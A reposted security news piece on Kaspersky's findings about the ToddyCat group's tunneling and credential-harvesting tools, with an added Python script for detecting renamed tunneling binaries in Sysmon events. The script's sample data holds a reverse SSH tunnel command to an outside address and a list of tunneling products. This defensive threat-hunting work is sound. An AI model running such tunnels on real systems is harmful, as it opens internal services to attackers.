Industrial-Scale Data Theft: The Advanced Tools of the ToddyCat Hacking Group

admin, 2024-04-24 01:18:57


The threat actor known as ToddyCat has been observed using a wide range of tools to retain access to compromised environments and steal valuable data.


Russian cybersecurity firm Kaspersky characterized the adversary as relying on various programs to harvest data on an "industrial scale" from primarily governmental organizations, some of them defense related, located in the Asia-Pacific region.


"To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack," security researchers Andrey Gunkin, Alexander Fedotov, and Natalya Shornikova said.


ToddyCat was first documented by the company in June 2022 in connection with a series of cyber attacks aimed at government and military entities in Europe and Asia since at least December 2020. These intrusions leveraged a passive backdoor dubbed Samurai that allows for remote access to the compromised host.


A closer examination of the threat actor's tradecraft has since uncovered additional data exfiltration tools like LoFiSe and Pcexter to gather data and upload archive files to Microsoft OneDrive.


The latest set of programs entails a mix of tunneling and data-gathering software, put to use after the attacker has already obtained access to privileged user accounts on the infected system. This includes:


  • Reverse SSH tunnel using OpenSSH

  • SoftEther VPN, which is renamed to seemingly innocuous files like "boot.exe," "mstime.exe," "netscan.exe," and "kaspersky.exe"

  • Ngrok and Krong to encrypt and redirect command-and-control (C2) traffic to a certain port on the target system

  • FRP client, an open-source Golang-based fast reverse proxy

  • Cuthead, a .NET compiled executable to search for documents matching a specific extension or a filename, or the date when they are modified

  • WAExp, a .NET program to capture data associated with the WhatsApp web app and save it as an archive, and

  • TomBerBil to extract cookies and credentials from web browsers like Google Chrome and Microsoft Edge

Maintaining multiple simultaneous connections from the infected endpoints to actor-controlled infrastructure using different tools is seen as a fallback mechanism and a way to retain access in cases where one of the tunnels is discovered and taken down.
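As an added example that is not part of the original article or Kaspersky's report, the following Python script shows one way a defender could hunt for the renamed SoftEther binaries and the reverse SSH tunnels listed above: it compares each process's on-disk name with the OriginalFileName and Product version fields that Sysmon records in process-creation events (Event ID 1). The line format, the product substrings and the sample events are constructed assumptions, not real telemetry.

```python
# Added example (not the article's or Kaspersky's code): flag tunneling tools running
# under a renamed image via the PE version fields Sysmon logs in Event ID 1.
import re

TUNNEL_PRODUCTS = ("softether", "ngrok", "frp", "openssh")  # Product substrings (assumed)
# Innocuous names Kaspersky reports ToddyCat giving renamed SoftEther binaries.
KNOWN_RENAMES = {"boot.exe", "mstime.exe", "netscan.exe", "kaspersky.exe"}

def parse_event(line):
    """Parse one 'Key=value, Key=value' event line (constructed format)."""
    return dict(re.findall(r"(\w+)=([^,]*)", line))

def classify(event):
    """Return a verdict string for one process-creation event, or None if benign."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    product = event.get("Product", "").lower()
    cmdline = event.get("CommandLine", "")
    tunnel_tool = any(p in product for p in TUNNEL_PRODUCTS)
    # A tunneling tool whose on-disk name differs from its compiled-in name.
    if tunnel_tool and original and original != image:
        return "renamed tunneling tool"
    # Reverse tunnel: ssh -R publishes a local port on the remote host.
    if original == "ssh.exe" and re.search(r"(^|\s)-R\s", cmdline):
        return "reverse ssh tunnel"
    # One of the reported file names with no version info to say what it really is.
    if image in KNOWN_RENAMES and not original:
        return "known rename name, no version info"
    return None

def scan(lines):
    """Run classify() over raw event lines; return (image name, verdict) hits."""
    hits = []
    for event in map(parse_event, lines):
        verdict = classify(event)
        if verdict:
            hits.append((event["Image"].rsplit("\\", 1)[-1], verdict))
    return hits

SAMPLE_EVENTS = [  # constructed; 203.0.113.10 is a documentation address
    "Image=C:\\Windows\\Temp\\kaspersky.exe, OriginalFileName=vpnclient.exe, "
    "Product=SoftEther VPN, CommandLine=kaspersky.exe /start",
    "Image=C:\\Windows\\System32\\svchost.exe, OriginalFileName=svchost.exe, "
    "Product=Microsoft Windows, CommandLine=svchost.exe -k netsvcs",
    "Image=C:\\Program Files\\OpenSSH\\ssh.exe, OriginalFileName=ssh.exe, "
    "Product=OpenSSH, CommandLine=ssh.exe -N -R 8443:127.0.0.1:3389 u@203.0.113.10",
    "Image=C:\\Users\\Public\\netscan.exe, OriginalFileName=, Product=, "
    "CommandLine=netscan.exe",
]
```

Run `scan(SAMPLE_EVENTS)` to see the three hits; the svchost event is left alone because its name matches its version info and it is not a tunneling product.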


"The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system," Kaspersky said.


"To protect the organization's infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information."


References

[1] https://thehackernews.com/2024/04/russian-hacker-group-toddycat-uses.html

Originally published on the WeChat official account 知机安全: Industrial-Scale Data Theft: The Advanced Tools of the ToddyCat Hacking Group

Reposts must retain this link (CN-SEC Chinese site; thanks to the original author for their work): Industrial-Scale Data Theft: The Advanced Tools of the ToddyCat Hacking Group http://cn-sec.com/archives/2683641.html